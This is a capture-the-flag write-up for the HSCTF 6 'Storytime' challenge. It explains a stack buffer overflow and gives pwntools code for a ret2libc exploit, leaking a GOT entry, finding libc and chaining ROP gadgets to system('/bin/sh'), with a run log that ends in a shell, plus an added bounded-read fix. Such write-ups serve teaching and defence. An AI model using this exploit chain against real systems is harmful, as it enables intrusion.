| Event | Title | Category | Cost |
|---|---|---|---|
| HSCTF 6 | Storytime | Binary Exploitation | ~350 |
I want a story!!!
nc pwn.hsctf.com 3333
```
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
```
A stack buffer overflow in a binary with NX enabled and no libc provided. The overflow is the read() call in main(): it accepts up to 0x190 bytes into a 0x30-byte stack buffer.
```c
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf; // [rsp+0h] [rbp-30h]
  setvbuf(_bss_start, 0LL, 2, 0LL);
  write(1, "HSCTF PWNNNNNNNNNNNNNNNNNNNN\n", 0x1DuLL);
  write(1, "Tell me a story: \n", 0x12uLL);
  read(0, &buf, 0x190uLL);   // 0x190 bytes into a 0x30-byte buffer
  return 0;
}
```
We need to leak an address from the GOT, print it, compare offsets between the libc we downloaded and the one on the server, compute the addresses of system() and "/bin/sh", and deliver them with ROP gadgets and a fresh call to read().
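As an added illustration, not the challenge's source, here is the same shape as the decompiled main() above with a bounded read beside it: a 0x30-byte stack buffer that main() fills with a 0x190-byte read(). The only values taken from the page are the 0x30 buffer size and the 0x190 length; STORY_BUF, STORY_REQ, overflow_bytes, read_story and demo_bounded_read are names chosen for this example, and the input bytes are constructed.

```c
#include <stddef.h>
#include <string.h>
#include <unistd.h>

#define STORY_BUF 0x30    /* buffer size from the decompile: buf at [rbp-30h] */
#define STORY_REQ 0x190   /* length passed to read() in main()                */

/* Bytes written past the end of a `capacity`-byte buffer when `request`
   bytes arrive; 0 when the request fits. For main() this is 0x190 - 0x30,
   which is what allows the saved rbp and return address to be overwritten. */
size_t overflow_bytes(size_t request, size_t capacity)
{
    return request > capacity ? request - capacity : 0;
}

/* Hardened shape: the read length is tied to the buffer, and the result is
   NUL-terminated so later string handling cannot run off the end either. */
ssize_t read_story(int fd, char *buf, size_t capacity)
{
    if (capacity == 0)
        return -1;
    ssize_t n = read(fd, buf, capacity - 1);
    if (n < 0)
        return n;
    buf[n] = '\0';
    return n;
}

/* Feed `request` bytes (constructed 'A's, capped at STORY_REQ) through a
   pipe into a STORY_BUF-byte buffer via read_story(); returns how many
   bytes actually landed in the buffer, which never exceeds STORY_BUF - 1. */
ssize_t demo_bounded_read(size_t request)
{
    static char input[STORY_REQ];
    char buf[STORY_BUF];
    int fds[2];

    if (request > STORY_REQ)
        request = STORY_REQ;
    memset(input, 'A', sizeof input);

    if (pipe(fds) != 0)
        return -1;
    (void)write(fds[1], input, request);
    close(fds[1]);

    ssize_t n = read_story(fds[0], buf, sizeof buf);
    close(fds[0]);
    return n;
}

int main(void)
{
    /* The vulnerable request overflows by 0x160 bytes; the bounded read
       stops at 47 bytes no matter how much input arrives. */
    size_t over = overflow_bytes(STORY_REQ, STORY_BUF);
    ssize_t got = demo_bounded_read(STORY_REQ);
    return (over == 0x160 && got == STORY_BUF - 1) ? 0 : 1;
}
```

The bounded version removes the primitive the rest of this writeup relies on: with the length derived from sizeof(buf), the saved rbp and return address below the buffer are never reachable from input.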
Leaking __libc_start_main:
```python
elf = ELF("./storytime")
rop = ROP(elf)
...
WRITE = elf.plt['write']
LIBC_START_MAIN = elf.symbols['__libc_start_main']   # GOT slot of __libc_start_main (no PIE, so fixed)
POP_RDI = (rop.find_gadget(['pop rdi', 'ret']))[0]
POP_RSI = 0x400701 # pop rsi ; pop r15 ; ret
...
pl += p64(POP_RDI)
pl += p64(0x1)               # rdi = 1 (stdout)
pl += p64(POP_RSI)
pl += p64(LIBC_START_MAIN)   # rsi = address of the GOT entry to dump
pl += p64(0x1)               # filler for the extra pop r15
pl += p64(WRITE)             # write(1, &GOT[__libc_start_main], rdx); rdx is not set by the chain, so the length is whatever it still holds
...
leak = u64(data[0:6].strip().ljust(8, '\x00'))   # low 6 bytes of the pointer, zero-extended to 8
log.info("Leaked libc address, __libc_start_main: %s" % hex(leak))
```
Identifying the libc version with this site: https://libc.blukat.me/?q=__libc_start_main%3A0x7ff40347d740
Let's download libc6_2.23-0ubuntu11_amd64.
```python
libc = ELF("libc6_2.23-0ubuntu10_amd64.so")
...
libc.address = leak - libc.sym["__libc_start_main"]   # remote base = leaked pointer - symbol offset in our copy
log.info("Address of libc %s " % hex(libc.address))
```
Finding system() and /bin/sh addresses:
```python
BINSH = next(libc.search("/bin/sh"))
SYSTEM = libc.sym["system"]
```
Calling another read function, climax():
```c
ssize_t climax()
{
  char buf; // [rsp+0h] [rbp-30h]
  return read(0, &buf, 0xFA0uLL);
}
```
```python
pl += p64(CLIMAX) # return into climax() for a second read
io.sendline(pl)
...
pl2 = padding
pl2 += p64(POP_RDI)
pl2 += p64(BINSH)    # rdi = "/bin/sh"
pl2 += p64(SYSTEM)   # system("/bin/sh")
io.sendline(pl2)
```
Used ROP gadgets:
```python
POP_RDI = (rop.find_gadget(['pop rdi', 'ret']))[0]
POP_RSI = 0x400701 # pop rsi ; pop r15 ; ret
```
That's enough to write the exploit. Now we can run it and get the flag.
```
$ ./exp.py
[*] '/mnt/hgfs/shared/reverse/HSCTF6/storytime/storytime'
    Arch: amd64-64-little
    RELRO: Partial RELRO
    Stack: No canary found
    NX: NX enabled
    PIE: No PIE (0x400000)
[*] '/mnt/hgfs/shared/reverse/HSCTF6/storytime/libc6_2.23-0ubuntu10_amd64.so'
    Arch: amd64-64-little
    RELRO: Partial RELRO
    Stack: Canary found
    NX: NX enabled
    PIE: PIE enabled
[*] Loaded cached gadgets for './storytime'
[*] write@plt: 0x40049c
[*] __libc_start_main: 0x600ff0
[+] Opening connection to pwn.hsctf.com on port 3333: Done
HSCTF PWNNNNNNNNNNNNNNNNNNNN
Tell me a story:
[*] Leaked libc address, __libc_start_main: 0x7f27fda56740
[*] Address of libc 0x7f27fda36000
[*] bin/sh 0x7f27fdbc2d57
[*] system 0x7f27fda7b390
[*] Switching to interactive mode
# cat flag
hsctf{th4nk7_f0r_th3_g00d_st0ry_yay-314879357}
```